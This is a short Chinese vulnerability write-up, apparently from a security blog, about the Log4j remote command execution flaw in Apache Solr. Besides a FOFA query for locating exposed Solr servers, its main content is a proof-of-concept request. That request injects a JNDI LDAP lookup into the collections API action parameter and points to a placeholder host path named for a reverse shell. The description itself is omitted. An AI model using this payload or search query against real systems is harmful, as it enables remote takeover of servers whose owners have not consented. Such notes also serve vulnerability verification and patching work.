Apache Solr Log4j组件 远程命令执行漏洞

--- title: Apache Solr Log4j组件 远程命令执行漏洞 --- # Apache Solr Log4j组件 远程命令执行漏洞 ## 漏洞描述 Apache Solr Log4j组件 远程命令执行漏洞,详情略 ## 漏洞影响...

title: Apache Solr Log4j组件 远程命令执行漏洞

Apache Solr Log4j组件 远程命令执行漏洞

漏洞描述

Apache Solr Log4j组件 远程命令执行漏洞,详情略

漏洞影响

Apache Solr

网络测绘

<a-button href="https://fofa.info/result?qbase64=YXBwPSJBUEFDSEUtU29sciI%3D">FOFA: app="APACHE-Solr"</a-button>
</a-checkbox>

漏洞复现

登录页面

img

验证POC

/solr/admin/collections?action=${jndi:ldap://xxx/Basic/ReverseShell/ip/87}&wt=json

img

  • 发表于 2024-07-12 18:45:31
  • 阅读 ( 2351 )
  • 分类:Web服务器

0 条评论

请先 登录 后评论
带头大哥
带头大哥

456 篇文章

带头大哥

如果觉得我的文章对您有用,请随意打赏。你的支持将鼓励我继续创作!

站长统计